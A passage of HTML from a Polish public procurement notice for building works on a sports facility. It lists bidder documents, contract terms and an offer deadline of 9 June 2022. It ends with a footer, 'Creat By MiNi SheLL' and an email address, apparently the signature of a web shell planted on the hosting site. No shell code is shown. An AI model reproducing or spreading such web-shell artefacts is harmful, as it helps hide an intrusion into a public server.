ust.1 pkt 4 ustawy, sporządzonym nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3)	dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia – w wysokości minimum 1 000 000,00 zł.<br/><br/>4)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/><br/>Wykonawcy zobowiązani są udokumentować posiadanie doświadczenia zawodowego uzyskanych w okresie ostatnich 5 lat, które obejmuje wykonanie robót budowlanych w zakresie budowy/przebudowy/ remoncie obiektu sportowego o wartości nie mniejszej niż 1 000 000,00 zł <br/><br/><br/>5)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami<br/>budowlanymi, w specjalności konstrukcyjno-budowlanej i co najmniej 5 lat doświadczenia w branży budowlanej na stanowisku kierownika budowy lub kierownika robót, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacja o podstawie do dysponowania tymi osobami – co najmniej 1 osoba</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenie Wykonawcy, w zakresie art.108 ust.1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2021r., poz.275), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej<br/><br/><br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie wynikającym z art. 109 ust.1 pkt 4 ustawy, sporządzonym nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art.454-455 ustawy Pzp oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 8 SWZ.<br/>2. Zmiana umowy wymaga, pod rygorem nieważności wymaga zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-09 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ w postaci elektronicznej opatrzonej elektronicznym podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym. Składanie ofert następuje za pośrednictwem platformy dostępnej pod adresem https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-09 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com